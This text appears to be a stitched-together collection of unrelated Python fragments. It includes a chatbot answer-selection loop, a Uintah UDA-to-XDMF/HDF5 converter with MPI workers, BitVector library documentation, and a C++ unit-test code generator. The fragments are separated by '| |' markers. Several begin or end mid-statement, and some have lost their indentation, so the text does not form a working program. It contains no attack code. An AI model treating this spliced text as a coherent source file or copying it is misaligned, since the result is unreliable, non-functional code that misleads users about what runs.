logger.info("{} has no good match".format(character.id))
cross_trace.append((character.id, stage, 'No good match. Answer: {}, Trace: {}'.format(answer, trace)))
cached_responses['nogoodmatch'].append((response, answer, character))
elif response.get('bad'):
cross_trace.append((character.id, stage, 'Bad answer. Answer: {}, Trace: {}'.format(answer, trace)))
cached_responses['bad'].append((response, answer, character))
elif DISABLE_QUIBBLE and response.get('quibble'):
cross_trace.append((character.id, stage, 'Quibble answer. Answer: {}, Trace: {}'.format(answer, trace)))
cached_responses['quibble'].append((response, answer, character))
else:
answered = True
if answered:
if random.random() < weight:
cross_trace.append((character.id, stage, 'Trace: {}'.format(trace)))
else:
answered = False
cross_trace.append((character.id, stage, 'Pass through. Answer: {}, Weight: {}, Trace: {}'.format(answer, weight, trace)))
logger.info("{} has answer but dismissed".format(character.id))
if character.id == 'markov':
cached_responses['markov'].append((response, answer, character))
elif character.id == 'es':
if response.get('exact_match') or response.get('ok_match'):
cached_responses['es'].append((response, answer, character))
else:
cached_responses['nogoodmatch'].append((response, answer, character))
else:
cached_responses['pass'].append((response, answer, | |
None
self.name = "T"+timestep_element.text
self.path = path+timestep_element.attrib["href"]
self.time = timestep_element.attrib["time"]
self.delta = timestep_element.attrib["oldDelt"]
tree = ET.parse(self.path)
self.root = tree.getroot()
self.res = ast.literal_eval(self.root.find(".//geom_object/res").text)
self.interpolator = self.root.find(".//MPM/interpolator").text
Domain_factory.interpolator = self.interpolator
patch_xml = self.root.findall(".//Data/Datafile")
for patch in patch_xml:
Patch_lightweight.patchfiles[int(patch.attrib["proc"])] = patch.attrib["href"]
self.rel_path = os.path.dirname(self.path)+"/"
if self.verbose:
print("reading timestep "+self.name)
def parse(self):
    """!
    @brief Parses contained data after initialization.

    Wraps every Grid node found under the timestep's XML root in a
    Grid_lightweight and stores it in self.contents.
    @return None
    """
    if self.verbose:
        print("parsing timestep " + self.name)
    grid_nodes = self.root.findall(".//Grid")
    self.contents.extend(Grid_lightweight(node, self.rel_path) for node in grid_nodes)
def get_element(self):
    """!
    @brief Returns element data and derives and appends xyz and topology data.

    The derived corner coordinates (xyz) and connectivity (topology) are
    cached on the instance; subsequent calls append the cached arrays and
    return immediately.
    @return array of (name, data) element tuples
    </full docs>
    """
    result = super(Timestep_lightweight, self).get_element()
    # Cached path: xyz/topology were already derived on a previous call.
    if self.xyz is not None and self.topology is not None:
        result.append((self.name + "/xyz", self.xyz))
        result.append((self.name + "/topology", self.topology))
        return result
    # Collect particle centroid (p.x) and scalefactor datasets.
    centroids = []
    scalefactors = []
    domains = []
    for element in result:
        name = element[0].split('/')[-1]
        if name == "p.x":
            centroids.append(element)
        if name == "p.scalefactor":
            scalefactors.append(element)
    # BUGFIX: original tested "len(scalefactors) is 0" -- identity
    # comparison with an int literal is implementation-defined and raises
    # SyntaxWarning on modern Python; use an emptiness check instead.
    if not scalefactors:
        for centroid in centroids:
            domains.append((centroid, ("", [])))
    # associate centroids and scalefactors
    else:
        for centroid in centroids:
            cent_path = os.path.dirname(centroid[0])
            for i, scalefactor in enumerate(scalefactors):
                scale_path = os.path.dirname(scalefactor[0])
                # Match by directory and particle count.
                if scale_path == cent_path and centroid[1].shape[0] == scalefactor[1].shape[0]:
                    domains.append((centroid, scalefactor))
                    scalefactors.pop(i)
                    break
    # calculate xyz coordinates for each centroid/scalefactor combination
    xyz = []
    if self.verbose:
        print("extrapolating corners using " + self.interpolator + " method")
    for domain in domains:
        # domain[0][1] = p.x coord
        # domain[1][1] = p.scalefactor argument
        for i, element in enumerate(domain[0][1]):
            # CPTI/CPDI
            if self.interpolator == 'cpti' or self.interpolator == 'cpdi':
                # pack rvectors with scalefactors
                # scalefactor vectors passed as a len=9 array
                scale = domain[1][1][i]
                r = []
                r.append([scale[0], scale[3], scale[6]])  # r1 = r[0]
                r.append([scale[1], scale[4], scale[7]])  # r2 = r[1]
                r.append([scale[2], scale[5], scale[8]])  # r3 = r[2]
                xyz.append(Domain_factory.calculate_domain(
                    element,
                    r,
                    interpolator=self.interpolator))
            # GIMP
            else:
                # NOTE(review): cellspacing is unbound if self.contents is
                # empty -- original had the same behaviour; confirm grids
                # always exist before this point.
                for grid in self.contents:
                    cellspacing = grid.get_level_cellspacing()
                    if cellspacing:
                        break
                # pack rvectors from cell spacing / particle resolution
                r = []
                r.append([cellspacing[0] / float(self.res[0]), 0.0, 0.0])  # r1 = r[0]
                r.append([0.0, cellspacing[1] / float(self.res[1]), 0.0])  # r2 = r[1]
                r.append([0.0, 0.0, cellspacing[2] / float(self.res[2])])  # r3 = r[2]
                xyz.append(Domain_factory.calculate_domain(
                    element,
                    r,
                    interpolator=self.interpolator))
    # NOTE(review): np.concatenate raises on an empty sequence; the
    # original had the same behaviour when no domains were found.
    xyz_data = np.concatenate(xyz)
    self.xyz = xyz_data
    xyz_name = self.name + "/xyz"
    result.append((xyz_name, xyz_data))
    # generate topology for the coordinates: group consecutive corner
    # indices into one connectivity entry per particle
    cpp = Domain_calculators.corners_per_particle[self.interpolator]
    topology = []
    topo_item = []
    for i in range(xyz_data.shape[0]):
        topo_item.append(i)
        if (i + 1) % cpp == 0:
            topology.append(topo_item)
            topo_item = []
    topo_data = np.array(topology)
    self.topology = topo_data
    topo_name = self.name + "/topology"
    result.append((topo_name, topo_data))
    return result
def generate_h5(self):
    """!
    @brief Generates h5 data from elements.

    De-duplicates dataset paths: data for a path seen more than once is
    appended row-wise to the first occurrence. Empty datasets are skipped.
    @return tuple (paths, path_data) of h5 paths and their data arrays
    """
    if self.verbose:
        print("generating h5 elements")
    datasets = self.get_element()
    paths = []
    path_data = []
    for element in datasets:
        # BUGFIX: original used "len(...) is not 0" -- identity comparison
        # with an int literal; use an explicit length check instead.
        if len(element[1]) == 0:
            continue
        if element[0] not in paths:
            paths.append(element[0])
            path_data.append(element[1])
        else:
            index = paths.index(element[0])
            path_data[index] = np.append(path_data[index], element[1], 0)
    return (paths, path_data)
def generate_xmf(self, root, h5_handle, h5_path, h5_root):
    """!
    @brief Generates xmf descriptors to data for the timestep.
    @param root etree parent root
    @param h5_handle file handle for the h5 data
    @param h5_path path of this timestep's data inside the h5 file
    @param h5_root root of the h5 data path (name of the dataset)
    @return None
    """
    if self.verbose:
        print("generating xmf descriptor")
    elements = self.get_element()
    timestep = ET.SubElement(root, "Grid")
    timestep.attrib["Name"] = self.name
    timestep.attrib["GridType"] = "Uniform"
    # Topology descriptor: tetrahedra for CPTI corners, hexahedra otherwise.
    topology = ET.SubElement(timestep, "Topology")
    for path in elements:
        name = path[0].split('/')[-1]
        if name == "topology":
            topo_data_path = h5_root + path[0]
            topo_data_element = h5_handle[h5_path + path[0]]
            if self.interpolator == 'cpti':
                topology.attrib["TopologyType"] = "Tetrahedron"
            else:
                topology.attrib["TopologyType"] = "Hexahedron"
            # XDMF2 requires the element count on the Topology node.
            # NOTE(review): "args" is a module-level argparse namespace.
            if args.xdmf2:
                topology.attrib["NumberOfElements"] = str(topo_data_element.shape[0])
            topo_data = ET.SubElement(topology, "DataItem")
            topo_data.attrib["Format"] = "HDF"
            topo_data.attrib["DataType"] = "UInt"
            topo_data.attrib["Precision"] = "8"
            topo_data.text = topo_data_path
            topo_data.attrib["Dimensions"] = str(topo_data_element.shape[0]) + " " + str(topo_data_element.shape[1])
    # Geometry descriptor (XYZ corner coordinates).
    geometry = ET.SubElement(timestep, "Geometry")
    geometry.attrib["GeometryType"] = "XYZ"
    geo_data = ET.SubElement(geometry, "DataItem")
    geo_data.attrib["Format"] = "HDF"
    geo_data.attrib["DataType"] = "Float"
    geo_data.attrib["Precision"] = "8"
    for path in elements:
        name = path[0].split('/')[-1]
        if name == "xyz":
            geo_data.text = h5_root + path[0]
            geo_shape = h5_handle[h5_path + path[0]].shape
            geo_data.attrib["Dimensions"] = str(geo_shape[0]) + " " + str(geo_shape[1])
    time = ET.SubElement(timestep, "Time")
    time.attrib["Value"] = self.time
    # Recurse into contained grid levels.
    for level in self.contents:
        level.generate_xmf(timestep, h5_handle, h5_path + self.name + "/", h5_root + self.name + "/")
class Uda_lightweight(Lightweight_container):
    """!
    @brief A minimal proof of concept for reading in Uda data.
    """
    # Map of variable name -> type string, shared across instances.
    variables = {}
    # Dataset name mirrored statically so worker processes can reach it.
    static_name = ""

    def __init__(self, root_folder, target_timestep=None):
        """!
        @brief Derived initializer for the container.
        @param root_folder folder containing timestep folders, index and input xmls
        @param target_timestep optional collection of timestep names to keep
        """
        super(Uda_lightweight, self).__init__()
        read_error = True
        if os.path.isdir(root_folder):
            self.root_folder = root_folder
            # BUGFIX: original used `is not "/"` -- identity comparison
            # with a string literal; compare by value instead.
            if not self.root_folder.endswith("/"):
                self.root_folder += "/"
            read_error = self._read_input()
            # NOTE(review): `and` reports failure only when BOTH reads
            # fail; if either file is mandatory this should be `or` --
            # confirm intent before changing.
            read_error = self._read_index(target_timestep=target_timestep) and read_error
        if read_error:
            print("Failed to read. Please pass Uda folder containing the index.xml and input.xml files.")
            exit()

    def _read_index(self, target_timestep=None):
        """!
        @brief Initializes data from the index xml.
        @param target_timestep array of the timestep names to be parsed
        @return return conditional, true if exit on error
        """
        index_file = self.root_folder + "index.xml"
        if not os.path.exists(index_file):
            return True
        index_tree = ET.parse(index_file)
        index_root = index_tree.getroot()
        self.particle_position = index_root.find(".//ParticlePosition").text
        self.data_endianness = index_root.find(".//endianness").text
        Variable_data_factory.endianness = self.data_endianness
        for ele in index_root.findall(".//variables/variable"):
            Uda_lightweight.variables[ele.attrib["name"]] = ele.attrib["type"]
        for ele in index_root.findall(".//timesteps/timestep"):
            self.contents.append(Timestep_lightweight(ele, self.root_folder))
            # When a target list is given, keep only the requested steps.
            if target_timestep:
                if self.contents[-1].name not in target_timestep:
                    del self.contents[-1]
        return False

    def _read_input(self):
        """!
        @brief Initializes data from the input xml.
        @return return conditional, true if exit on error
        """
        input_file = self.root_folder + "input.xml"
        if not os.path.exists(input_file):
            return True
        input_tree = ET.parse(input_file)
        input_root = input_tree.getroot()
        self.name = input_root.find(".//Meta/title").text
        Uda_lightweight.static_name = self.name
        self.time_min = input_root.find(".//Time/initTime").text
        self.time_max = input_root.find(".//Time/maxTime").text
        self.delta_min = input_root.find(".//Time/delt_min").text
        self.delta_max = input_root.find(".//Time/delt_max").text
        return False

    def generate_descriptors(self, h5_handle, xmf_handle):
        """!
        @brief Generates h5 and xmf files in order.

        Serial when running on a single rank; otherwise timesteps are
        distributed round-robin over the size-1 MPI worker ranks.
        @param h5_handle handle of the opened h5 file
        @param xmf_handle handle of the opened xmf file
        @return None
        """
        root = self.generate_xmf(h5_handle.filename, xmf_handle)
        timeseries_grid = root.find(".//Grid[@Name='TimeSeries']")
        h5_path = self.name + "/"
        h5_root = h5_handle.filename + ":" + h5_path
        if size == 1:
            # Serial path: parse each timestep and release it immediately
            # to keep memory bounded.
            while len(self.contents) > 0:
                item = self.contents[0]
                item.parse()
                h5_paths, h5_data_sets = item.generate_h5()
                for i, path in enumerate(h5_paths):
                    h5_handle.create_dataset(h5_path + path, data=h5_data_sets[i])
                item.generate_xmf(timeseries_grid, h5_handle, h5_path, h5_root)
                del self.contents[0]
        else:
            # Split items by processor, round robin over size-1 workers.
            proc_items = []
            for proc_index in range(size - 1):
                proc_items.append([])
            for i, item in enumerate(self.contents):
                proc_items[i % (size - 1)].append(item)
            # Send the static info every worker needs.
            for i in range(size - 1):
                comm.send((Patch_lightweight.patchfiles, Domain_factory.interpolator), dest=(i + 1), tag=1)
            for i, item in enumerate(proc_items):
                comm.send(item, dest=(i + 1), tag=2)
            proc_items_parsed = []
            done_threads = []
            done = False
            for i in range(size - 1):
                proc_items_parsed.append([])
            while not done:
                for i in range(size - 1):
                    index = i + 1
                    if comm.Iprobe(source=index, tag=3):
                        proc_items_parsed[i].append(comm.recv(source=index, tag=3))
                        # A worker signals completion with a None sentinel.
                        # BUGFIX: compare against None with `is`, not `==`.
                        if proc_items_parsed[i][-1] is None:
                            done_threads.append(index)
                        else:
                            item = proc_items_parsed[i].pop()
                            h5_paths, h5_data_sets = item.generate_h5()
                            # BUGFIX: the inner loop shadowed the worker
                            # index `i`; use a distinct variable.
                            for j, path in enumerate(h5_paths):
                                h5_handle.create_dataset(h5_path + path, data=h5_data_sets[j])
                            item.generate_xmf(timeseries_grid, h5_handle, h5_path, h5_root)
                            # Ack the processed item so the worker sends
                            # the next one.
                            # NOTE(review): original indentation was
                            # ambiguous; the ack is kept on the processed-
                            # item branch -- confirm against the worker.
                            comm.send(0, dest=index, tag=4)
                # Finished only once every worker has sent its sentinel.
                for i in range(size - 1):
                    if (i + 1) not in done_threads:
                        done = False
                        break
                else:
                    done = True
        xmf_handle.write(ET.tostring(root))

    @staticmethod
    def generate_descriptor_parallel(item):
        """!
        @brief Worker-side helper: parses an item and caches its datasets.
        @param item timestep container to parse
        @return the parsed item
        """
        item.parse()
        # Generating the dataset the first time caches the results.
        h5_paths, h5_datasets = item.generate_h5()
        return item

    def generate_h5(self, h5_handle):
        """!
        @brief Generates h5 file from data and paths.
        Deprecated by generate_descriptors.
        @param h5_handle the handle of the opened h5 file
        @return None
        """
        paths = []
        path_data = []
        for item in self.contents:
            item_paths, item_path_data = item.generate_h5()
            paths.extend(item_paths)
            path_data.extend(item_path_data)
        for i, path in enumerate(paths):
            h5_handle.create_dataset(self.name + "/" + path, data=path_data[i])
        h5_handle.flush()

    def generate_xmf(self, h5_filename, xmf_handle):
        """!
        @brief Generates xmf file root and timestep grid for timesteps.
        @param h5_filename name of the h5 file the descriptors reference
        @param xmf_handle the handle of the opened xmf file (unused here)
        @return xml root node
        """
        root = ET.Element("Xdmf")
        root.attrib["Version"] = "2.0"
        domain = ET.SubElement(root, "Domain")
        # Primary data container: a temporal collection of timestep grids.
        timeseries_grid = ET.SubElement(domain, "Grid")
        timeseries_grid.attrib["Name"] = "TimeSeries"
        timeseries_grid.attrib["GridType"] = "Collection"
        timeseries_grid.attrib["CollectionType"] = "Temporal"
        return root
if __name__=="__main__":
if rank == 0:
parser = argparse.ArgumentParser()
parser.add_argument("uda", help="uda directory with index.xml and input.xml files", type=str)
#parser.add_argument("xml", help="target output xml name", type=str)
#parser.add_argument("h5", help="target output h5 name", type=str)
parser.add_argument("--timestep", help="target timestep names (e.g. T1,T2,T10)", type=str)
parser.add_argument("--parse_all", help="parses non-particle centered variables, drastically increases runtime", action="store_true")
parser.add_argument("--verbose", help="prints debug messages", action="store_true")
parser.add_argument("--xdmf2", help="create XMF2 | |
supply a keyword argument to the constructor.
@title
INSTALLATION:
The BitVector class was packaged using Distutils. For installation,
execute the following command-line in the source directory (this is
the directory that contains the setup.py file after you have
downloaded and uncompressed the tar archive):
python setup.py install
You have to have root privileges for this to work. On Linux
distributions, this will install the module file at a location that
looks like
/usr/lib/python2.7/dist-packages/
If you do not have root access, you have the option of working
directly off the directory in which you downloaded the software by
simply placing the following statements at the top of your scripts
that use the BitVector class
import sys
sys.path.append( "pathname_to_BitVector_directory" )
To uninstall the module, simply delete the source directory, locate
where BitVector was installed with "locate BitVector" and delete
those files. As mentioned above, the full pathname to the installed
version is likely to look like
/usr/lib/python2.7/dist-packages/BitVector*
If you want to carry out a non-standard install of BitVector, look
up the on-line information on Distutils by pointing your browser to
http://docs.python.org/dist/dist.html
@title
INTRODUCTION:
The BitVector class is for a memory-efficient packed representation
of bit arrays and for logical operations on such arrays. The
operations supported on bit vectors are:
__add__ for concatenation
__and__ for bitwise logical AND
__contains__
__eq__, __ne__, __lt__, __le__, __gt__, __ge__
__getitem__ for indexed access
__getslice__ for slice access
__int__ for returning integer value
__invert__ for inverting the 1's and 0's
__iter__ for iterating through
__len__ for len()
__lshift__ for circular shifts to the left
__or__ for bitwise logical OR
__rshift__ for circular shifts to the right
__setitem__ for indexed and slice setting
__str__ for str()
__xor__ for bitwise logical XOR
count_bits
count_bits_sparse faster for sparse bit vectors
deep_copy
divide_into_two
gcd for greatest common divisor
gen_rand_bits_for_prime
get_hex_string_from_bitvector
get_text_from_bitvector
gf_divide for divisions in GF(2^n)
gf_MI for multiplicative inverse in GF(2^n)
gf_multiply for multiplications in GF(2)
gf_multiply_modular for multiplications in GF(2^n)
hamming_distance
int_val for returning the integer value
is_power_of_2
is_power_of_2_sparse faster for sparse bit vectors
jaccard_distance
jaccard_similarity
length
multiplicative_inverse
next_set_bit
pad_from_left
pad_from_right
permute
rank_of_bit_set_at_index
read_bits_from_file
reset
reverse
runs
shift_left for non-circular left shift
shift_right for non-circular right shift
slice assignment
set_value
test_for_primality
unpermute
write_to_file
write_bits_to_fileobject
@title
CONSTRUCTING BIT VECTORS:
You can construct a bit vector in the following different ways:
@tagC0
(C0) You construct an EMPTY bit vector using the following syntax:
bv = BitVector(size = 0)
@tagC1
(C1) You can construct a bit vector directly from either a tuple
or a list of bits, as in
bv = BitVector(bitlist = [1,0,1,0,0,1,0,1,0,0,1,0,1,0,0,1])
@tagC2
(C2) You can construct a bit vector from an integer by
bv = BitVector(intVal = 56789)
The bits stored now will correspond to the binary
representation of the integer. The resulting bit vector is
the shortest possible bit vector for the integer value
supplied. For example, when intVal is 0, the bit vector
constructed will consist of just the bit 0.
@tagC3
(C3) When initializing a bit vector with an intVal as shown above,
you can also specify a size for the bit vector:
bv = BitVector(intVal = 0, size = 8)
will return the bit vector consisting of the bit pattern
00000000. The zero padding needed for meeting the size
requirement is always on the left. If the size supplied is
smaller than what it takes to create the shortest possible
bit vector for intVal, an exception is thrown.
@tagC4
(C4) You can create a zero-initialized bit vector of a given size by
bv = BitVector(size = 62)
This bit vector will hold exactly 62 bits, all initialized to
the 0 bit value.
@tagC5
(C5) You can construct a bit vector from a disk file by a two-step
procedure. First you construct an instance of bit vector by
bv = BitVector(filename = 'somefile')
This bit vector itself is incapable of holding the bits. To
now create bit vectors that actually hold the bits, you need
to make the following sort of a call on the above variable
bv:
bv1 = bv.read_bits_from_file(64)
bv1 will be a regular bit vector containing 64 bits from the
disk file. If you want to re-read a file from the beginning
for some reason, you must obviously first close the file
object that was acquired with a call to the BitVector
constructor with a filename argument. This can be
accomplished by
bv.close_file_object()
@tagC6
(C6) You can construct a bit vector from a string of 1's and 0's by
bv = BitVector(bitstring = '110011110000')
@tagC7
(C7) Yet another way to construct a bit vector is to read the bits
directly from a file-like object, as in
import io
x = "111100001111"
fp_read = io.StringIO( x )
bv = BitVector(fp = fp_read)
print(bv) # 111100001111
@tagC8
(C8) You can also construct a bit vector directly from a text string
as shown by the example:
bv3 = BitVector(textstring = "hello")
print(bv3) # 0110100001100101011011000110110001101111
mytext = bv3.get_text_from_bitvector()
print mytext # hello
The bit vector is constructed by using the one-byte ASCII
encoding of the characters in the text string.
@tagC9
(C9) You can also construct a bit vector directly from a string
of hex digits as shown by the example:
bv4 = BitVector(hexstring = "68656c6c6f")
print(bv4) # 0110100001100101011011000110110001101111
myhexstring = bv4.get_hex_string_from_bitvector()
print myhexstring # 68656c6c6f
@tagC10
(C10) You can also construct a bit vector directly from a bytes type
object you previously created in your script. This can be
useful when you are trying to recover the integer parameters
stored in public and private keys. A typical usage scenario:
keydata = base64.b64decode(open(sys.argv[1]).read().split(None)[1])
bv = BitVector.BitVector(rawbytes = keydata)
where sys.argv[1] is meant to supply the name of a public key
file (in this case an SSH RSA public key file).
@title
OPERATIONS SUPPORTED BY THE BITVECTOR CLASS:
@title
DISPLAYING BIT VECTORS:
@tag1
(1) Since the BitVector class implements the __str__ method, a bit
vector can be displayed on a terminal by
print(bitvec)
or, for only Python 2.x, by
print bitvec
Basically, you can always obtain the string representation of a
bit vector by
str(bitvec)
and integer value by
int(bitvec)
@title
ACCESSING AND SETTING INDIVIDUAL BITS AND SLICES:
@tag2
(2) Any single bit of a bit vector bv can be set to 1 or 0 by
bv[M] = 1_or_0
print( bv[M] )
or, for just Python 2.x, by
bv[M] = 1_or_0
print bv[M]
for accessing (and setting) the bit at the position that is
indexed M. You can retrieve the bit at position M by bv[M].
Note that the index 0 corresponds to the first bit at the left
end of a bit pattern. This is made possible by the
implementation of the __getitem__ and __setitem__ methods.
@tag3
(3) A slice of a bit vector obtained by
bv[i:j]
is a bit vector constructed from the bits at index positions
from i through j-1. This is made possible by the
implementation of the __getslice__ method.
@tag4
(4) You can also carry out slice assignment:
bv1 = BitVector(size = 25)
bv2 = BitVector(bitstring = '1010001')
bv1[6:9] = bv2[0:3]
bv3 = BitVector(bitstring = '101')
bv1[0:3] = bv3
The first slice assignment will set the 6th, 7th, and the 8th
bits of the bit vector bv1 according to the first three bits of
bv2. The second slice assignment will set the first three bits
of bv1 according to the three bits in bv3. This is made
possible by the slice setting code in the __setitem__ method.
@tag5
(5) You can iterate over a bit vector, as illustrated by
for bit in bitvec:
print(bit)
This is made possible by the override definition for | |
+ language.PrintError('"ERROR : Equality check for '+message.Name+' failed"'))
result.append(WHITESPACE + language.WhiteSpace(0) + 'return false;')
result.append(WHITESPACE + language.CloseBrace())
elif unittestfw == UnitTestFramework.BOOST:
result.append(WHITESPACE + 'BOOST_REQUIRE_MESSAGE(' + equality_check + ', "ERROR : Equality check for '+message.Name+' failed.");')
elif unittestfw == UnitTestFramework.CPPuTEST:
result.append(WHITESPACE + 'CHECK_TEXT(' + equality_check + ', "ERROR : Equality check for '+message.Name+' failed.");')
else:
result.append(WHITESPACE + "// Incorrect option " + str(unittestfw) + " for "+message.Name+" EQUALITY CHECK, please see options in class UnitTestFramework")
return result, result_delete
def WRITE_UNITTEST_PACKED_STRUCT_SIZE(self, WHITESPACE='    ', unittestfw=UnitTestFramework.NO_FW):
    """Emit unit-test source lines verifying the struct is packed.

    Generates target-language code comparing sizeof(struct) against the
    accumulated sizeof of each member; a mismatch means padding was added.

    @param WHITESPACE indentation prefix for every emitted line
    @param unittestfw target framework (see UnitTestFramework)
    @return list of generated source lines
    """
    result = []
    struct = self.message
    language = self.language
    interface = self.interface
    struct_name = struct.Name
    size_struct_name = 'size_' + struct_name
    size_accum_struct_name = 'size_accum_' + struct_name
    result.append(WHITESPACE + language.FormatComment('Test ' + ("struct " if language.MessageDescriptor(interface, struct) == "" else "message " + language.MessageDescriptor(interface, struct)) + " " + struct_name + ' packedness'))
    # Open a scope so the size locals do not clash with other tests.
    result.append(WHITESPACE + language.OpenBrace())
    result.append(WHITESPACE + language.WhiteSpace(0) + language.InstantiateType('size_t', size_struct_name, 'sizeof(' + struct_name + ')') + ";")
    result.append(WHITESPACE + language.WhiteSpace(0) + language.InstantiateType('size_t', size_accum_struct_name, '0') + ";")
    structmembers = struct.Decompose()
    for mem in structmembers:
        membertype = mem[0]
        membername = mem[1]
        # Array members are stored as pointers: accumulate pointer size.
        result.append(WHITESPACE + language.WhiteSpace(0) + size_accum_struct_name + ' += sizeof(' + membertype + ('*' if struct.IsArray(membername) else '') + '); ' + language.FormatComment(struct_name + '::' + membername + ';'))
    if unittestfw == UnitTestFramework.NO_FW:
        result.append(WHITESPACE + language.WhiteSpace(0) + language.If(size_struct_name + ' != ' + size_accum_struct_name))
        result.append(WHITESPACE + language.WhiteSpace(0) + language.OpenBrace())
        # BUGFIX: original appended a stray trailing '"' to the PrintError
        # argument, producing an unterminated string in the generated code.
        result.append(WHITESPACE + language.WhiteSpace(1) + language.PrintError('"ERROR : Size of ' + struct_name + ' does not equal the sum of its separate parts: %i != %i" ,' + size_struct_name + ',' + size_accum_struct_name))
        result.append(WHITESPACE + language.WhiteSpace(1) + 'return false;')
        result.append(WHITESPACE + language.WhiteSpace(0) + language.CloseBrace())
    elif unittestfw == UnitTestFramework.BOOST:
        result.append(WHITESPACE + language.WhiteSpace(0) + 'BOOST_REQUIRE_MESSAGE(' + size_struct_name + ' == ' + size_accum_struct_name + ', "ERROR : Size of ' + struct_name + ' does not equal the sum of its separate parts.");')
    elif unittestfw == UnitTestFramework.CPPuTEST:
        result.append(WHITESPACE + language.WhiteSpace(0) + 'CHECK_EQUAL_TEXT(' + size_struct_name + ',' + size_accum_struct_name + ', "ERROR : Size of ' + struct_name + ' does not equal the sum of its separate parts.");')
    else:
        result.append(WHITESPACE + language.WhiteSpace(0) + "// Incorrect option " + str(unittestfw) + " for PACKEDNESS, please see options in class UnitTestFramework")
    # End scope
    result.append(WHITESPACE + language.CloseBrace())
    return result
def WRITE_DELETERS(self, to_delete, struct_name, WHITESPACE='    ', unittestfw=UnitTestFramework.NO_FW):
    """Emit ARM-only cleanup lines deleting temporaries and checking the
    custom allocator's bookkeeping (blocks in use, alloc/dealloc counts).

    @param to_delete names of temporaries the generated code must delete
    @param struct_name type whose allocator counters are checked
    @param WHITESPACE indentation prefix for every emitted line
    @param unittestfw target framework (see UnitTestFramework)
    @return list of generated source lines
    """
    language = self.language
    expected_count = str(len(to_delete))
    result = ["#ifdef __arm__"]
    result.append(WHITESPACE + "// ARM doesnt use shared_ptr's, but a custom allocator...Don't leak memory")
    if unittestfw == UnitTestFramework.CPPuTEST:
        result.append(WHITESPACE + 'CHECK_EQUAL_TEXT(' + struct_name + '::GetBlocksInUse(),' + expected_count + ',"ERROR : Somebody is using ' + struct_name + 's without deleting them.");')
        result.extend(WHITESPACE + "delete " + delete + ";" for delete in to_delete)
        result.append(WHITESPACE + 'CHECK_EQUAL_TEXT(' + struct_name + '::GetBlocksInUse(),0,"ERROR : Somebody is using ' + struct_name + 's without deleting them (2).");')
        result.append(WHITESPACE + 'CHECK_EQUAL_TEXT(' + struct_name + '::GetAllocations(),' + struct_name + '::GetDeallocations(),"ERROR : Somebody is using ' + struct_name + 's without deleting them (3).");')
    else:
        result.append(WHITESPACE + "if(" + struct_name + "::GetBlocksInUse() != " + expected_count + ")")
        result.append(WHITESPACE + language.WhiteSpace(0) + language.PrintError('"ERROR : Somebody is using ' + struct_name + 's without deleting them."'))
        result.extend(WHITESPACE + 'delete ' + delete + ';' for delete in to_delete)
        result.append(WHITESPACE + 'if(' + struct_name + '::GetBlocksInUse() != 0)')
        result.append(WHITESPACE + language.WhiteSpace(0) + language.PrintError('"ERROR : Somebody is using ' + struct_name + 's without deleting them (2)."'))
        result.append(WHITESPACE + 'if(' + struct_name + '::GetAllocations() != ' + struct_name + '::GetDeallocations())')
        result.append(WHITESPACE + language.WhiteSpace(0) + language.PrintError('"ERROR : Somebody is using ' + struct_name + 's without deleting them (3)."'))
    result.append('#endif // __arm__')
    return result
def WRITE_UNITTEST_FACTORY_PAYLOAD_SIZE(self, WHITESPACE='    ', unittestfw=UnitTestFramework.NO_FW):
    """Emit unit-test source lines verifying the factory's payload size.

    Creates a temporary message, accumulates the expected payload size from
    the struct members (arrays contribute sizeof(type)*50; the embedded
    protocol header member is excluded) and compares it against the
    header's payload-size field.

    @param WHITESPACE indentation prefix for every emitted line
    @param unittestfw target framework (see UnitTestFramework)
    @return list of generated source lines
    """
    struct = self.message
    language = self.language
    interface = self.interface
    struct_name = struct.Name
    result = []
    result.append(WHITESPACE + language.FormatComment('Test ' + ("struct " if language.MessageDescriptor(interface, struct) == "" else "message " + language.MessageDescriptor(interface, struct)) + " " + struct_name + ' payload size'))
    # Start scope for local vars redeclared
    result.append(WHITESPACE + language.OpenBrace())
    # Accumulator variable for the expected payload size.
    size_accumulator = 'size_accpl_' + struct.Name
    result.append(WHITESPACE + language.WhiteSpace(0) + language.InstantiateType('size_t ', size_accumulator, '0') + ";")
    # Reuse base class: create temporary structs (remember what to delete).
    lines, to_delete = self.WRITE_CREATE_MESSAGE(WHITESPACE + language.WhiteSpace(0))
    for line in lines:
        result.append(line)
    # Memory management via shared-pointer support.
    accessor = language.Accessor(True)
    # Whilst we decompose, we might as well build these too...
    member_size_strings = []
    # Member holding the protocol header; used below to read the payload
    # size. NOTE(review): stays None when the struct has no protocol
    # member, which would make the string concatenation below raise --
    # confirm every message reaching this writer carries one.
    protocol_membername = None
    structmembers = struct.Decompose()
    for mem in structmembers:
        membername = mem[1]
        membertype = mem[0]
        isArray = struct.IsArray(membername)
        isStruct = struct.IsStruct(membername)
        isProtocol = struct.IsProtocolStruct(membername)
        isEmbedded = isStruct or isProtocol
        if isEmbedded and not isArray:
            # Embedded struct support (i.e. user typed data). The protocol
            # member's size is ignored: the payload carries the data, not
            # the pointer, so it is compensated for elsewhere.
            if isProtocol:
                protocol_membername = membername
            else:
                member_size_strings.append(WHITESPACE + language.WhiteSpace(0) + size_accumulator + ' += sizeof(' + membertype + '); ' + language.FormatComment(struct.Name + '::' + membername))
        elif isArray:
            member_size_strings.append(WHITESPACE + language.WhiteSpace(0) + size_accumulator + ' += sizeof(' + membertype + ')*50;')
        else:  # Normal type
            member_size_strings.append(WHITESPACE + language.WhiteSpace(0) + size_accumulator + ' += sizeof(' + membertype + '); ' + language.FormatComment(struct.Name + '::' + membername))
    # Now accumulate the size of payload items
    for plitem in member_size_strings:
        result.append(plitem)
    # Now compare against the payload size recorded in the header.
    if unittestfw == UnitTestFramework.NO_FW:
        result.append(WHITESPACE + language.WhiteSpace(0) + language.If(self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize() + ' != ' + size_accumulator))
        result.append(WHITESPACE + language.WhiteSpace(0) + language.OpenBrace())
        # BUGFIX: original appended a stray '"' after the PrintError(...)
        # call, corrupting the generated source line.
        result.append(WHITESPACE + language.WhiteSpace(1) + language.PrintError('"ERROR : Size of ' + struct.Name + ' payload size does not equal the sum of its separate parts (less pointers to data): %i != %i " ,' + size_accumulator + ',' + self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize()))
        result.extend(self.WRITE_DELETERS(to_delete, struct_name, WHITESPACE + language.WhiteSpace(0), unittestfw))
        result.append(WHITESPACE + language.WhiteSpace(1) + 'return false;')
        result.append(WHITESPACE + language.WhiteSpace(0) + language.CloseBrace())
    elif unittestfw == UnitTestFramework.BOOST:
